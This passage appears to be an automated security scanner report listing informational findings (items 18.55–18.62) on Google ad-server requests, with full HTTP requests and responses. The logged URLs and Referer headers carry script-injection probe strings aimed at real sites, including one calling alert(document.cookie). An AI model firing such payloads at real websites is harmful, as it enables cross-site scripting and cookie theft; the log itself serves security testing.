Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 01:50:13 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14393

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0085a0;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.buzzillions.com/reviews/59ab9%25253C/title%25253E%25253Cscript%25253Ealert(1)%25253C/script%25253E4e54375ce26/x22%26hl%3Den%26client%3Dca-pub-1151291606842001%26adU%3Dwww.GMCdealer.com/GrandRapids%26adT%3DThe%2B2011%2BGMC%2BAcadia%26adU%3Dwww.Groupon.com/Grand-Rapids%26adT%3DGrand%2BRapids%2BCoupons%26adU%3Dwww.CadillacDealer.com/GrandRapids%26adT%3DFind%2Ba%2B2011%2BEscalade%26adU%3DeHarmony.com/Free-Communication%26adT%3DeHarmony%25C2%25AE%2BSpecial%2BEvent%26gl%3DUS&amp;usg=AFQjCNGqpxBYLzNHh3Zukie9Ccfvk0kywg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.55. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=7707606529&w=728&lmt=1296808619&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787019837&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296787019866&frm=0&adk=1367998553&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=969342198&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=1&dtd=53&xpc=hEXEWFZLTs&p=http%3A//www.bizfind.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:36:06 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4111

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%252522ns%253D%252522alert(0x0006C1)%26hl%3Den%26client%3Dca-pub-3033999741136561%26adU%3Dwww.facebook.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF78mhJTHx7XT0Y3YxpbrdPbU8HQA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.56. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=60&slotname=2067036752&w=468&lmt=1296787016&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787016748&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529&correlator=1296787013038&frm=0&adk=2139689042&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=2&dtd=12&xpc=YHKwpL9Wg6&p=http%3A//www.bizfind.us HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: id=2299c2bdf900002f||t=1296786962|et=730|cs=ziqtnqpy; expires=Sun, 03-Feb-2013 02:36:02 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:36:02 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Fri, 04 Feb 2011 02:36:02 GMT
Content-Length: 5976

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#993400;cursor:hand;}body,table,div,ul,li{font-size
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%252522ns%253D%252522alert(0x0006C1)%26hl%3Den%26client%3Dca-pub-3033999741136561%26adU%3DRoofing.Reply.com%26adT%3DABC%2BRoof%2B%2526amp%253B%2BGutters%2BPrices%26adU%3DWeddings.DexKnows.com/Bridesmaids%26adT%3DBridesmaid%2BDresses%26gl%3DUS&amp;usg=AFQjCNHY-DASZntvp7jPYA2z5ZuqAF1xMw" target=_blank><span style="display:inline-block;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png');height:16px;width:78px"><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" style=filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0) width=78></span>
...[SNIP]...

18.57. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1151291606842001&format=336x280_as&output=html&h=280&w=336&lmt=1296792058&channel=2580485469%2B6676530356%2B7430941303%2B7423008677%2B3389984008%2B2770489863%2B5766974533%2B0079161462&ad_type=text&color_bg=FFFFFF&color_border=FFFFFF&color_link=0085A0&color_text=777777&color_url=0085A0&flash=10.1.103&hints=reviews59ab9titlescriptalert1script4e54375ce26x22%20review%20reviews&url=http%3A%2F%2Fwww.buzzillions.com%2Freviews%2F59ab9%253C%2Ftitle%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E4e54375ce26%2Fx22&dt=1296770457996&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296770458025&frm=0&adk=16166161&ga_vid=2100204031.1296770458&ga_sid=1296770458&ga_hid=2006706455&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F17&fu=0&ifi=1&dtd=101&xpc=ImbB79zpHm&p=http%3A//www.buzzillions.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 22:00:08 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14297

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0085a0;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.buzzillions.com/reviews/59ab9%25253C/title%25253E%25253Cscript%25253Ealert(1)%25253C/script%25253E4e54375ce26/x22%26hl%3Den%26client%3Dca-pub-1151291606842001%26adU%3Dwww.ChevyDealer.com/GrandRapids%26adT%3DShop%2BChevy%2BSilverado%26adU%3Dwww.GMCdealer.com/GrandRapids%26adT%3DThe%2B2011%2BGMC%2BAcadia%26adU%3Dwww.ConsumerReports.org/Reviews%26adT%3DConsumer%2BReports%2BWebsite%26adU%3Dwww.CadillacDealer.com/GrandRapids%26adT%3DFind%2Ba%2B2011%2BEscalade%26gl%3DUS&amp;usg=AFQjCNEOE1TNnTe7fL2tB5F-exwduIAcBA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.58. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=60&slotname=2067036752&w=468&lmt=1296808485&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22&dt=1296786885777&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529&correlator=1296786883899&frm=0&adk=2139689042&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=132698905&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=2&dtd=7&xpc=IkOQW1Dli0&p=http%3A//www.bizfind.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:33:52 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 9302

<!doctype html><html><head><style>a{color:#993400}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22%26hl%3Den%26client%3Dca-pub-3033999741136561%26adU%3D53.com/SBALoans%26adT%3DSBA%2BJobs%2BAct%2Bof%2B2010%26adU%3DRoofing.Reply.com%26adT%3DLow%2BABC%2BRoof%2B%2526amp%253B%2BGutters%26gl%3DUS&amp;usg=AFQjCNFe487nVUZlguXmizbpTS04rDo2Sg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...

18.59. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=7707606529&w=728&lmt=1296808483&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22&dt=1296786883869&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296786883899&frm=0&adk=1367998553&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=132698905&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=1&dtd=60&xpc=q2p5ApuZuX&p=http%3A//www.bizfind.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:33:50 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4041

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22%26hl%3Den%26client%3Dca-pub-3033999741136561%26adU%3Dwww.facebook.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFkQaQZV7r-HsvkmsuLeQvYrve1ug" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.60. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=7707606529&w=728&lmt=1296787013&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787012997&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296787013038&frm=0&adk=1367998553&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=1&dtd=145&xpc=LTjYuEf78i&p=http%3A//www.bizfind.us HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:50:59 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:35:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Fri, 04 Feb 2011 02:35:59 GMT
Content-Length: 4758

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<span style="display:inline-block;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://pagead2.googlesyndication.com/pagead/images/i.png');height:12px;width:12px"><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 style=filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0) height=12px width=12px/></span></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%252522ns%253D%252522alert(0x0006C1)%26hl%3Den%26client%3Dca-pub-3033999741136561%26adU%3Dwww.FlashpointAcademy.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFExDqP9G55tspthj3x7N9lUcZLIw" target=_blank><span style="display:inline-block;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png');height:16px;width:78px"><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png style=filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0) width=78px/></span>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.61. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=60&slotname=2067036752&w=468&lmt=1296808620&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787020942&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529&correlator=1296787019866&frm=0&adk=2139689042&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=969342198&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=2&dtd=7&xpc=63KSbDVx6J&p=http%3A//www.bizfind.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:36:07 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10560

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#993400;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%252522ns%253D%252522alert(0x0006C1)%26hl%3Den%26client%3Dca-pub-3033999741136561%26adU%3Dwww.chicagoduelingpianos.com%26adT%3D%25231%2BDueling%2BPianos%26adU%3DRoofing.Reply.com%26adT%3DABC%2BRoof%2B%2526amp%253B%2BGutters%2BPrices%26gl%3DUS&amp;usg=AFQjCNFZyb2Rxw0pW0NcE2xTroa66M6VaA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.62. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-2047107563931596&output=html&h=90&slotname=8213712147&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.tucows.com%2Fpreviewf2a0f%2522-alert(document.cookie)-%2522d3b3f7c7cb3%2F194850%2Fx22&dt=1296766283429&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296766283459&frm=1&adk=539573683&ga_vid=579460989.1296766283&ga_sid=1296766283&ga_hid=838670802&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3718268994&fu=0&ifi=1&dtd=34 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 21:41:17 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1801

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
